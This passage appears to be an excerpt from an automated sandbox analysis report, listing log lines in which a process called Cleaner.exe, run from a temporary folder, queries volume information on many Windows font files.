                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
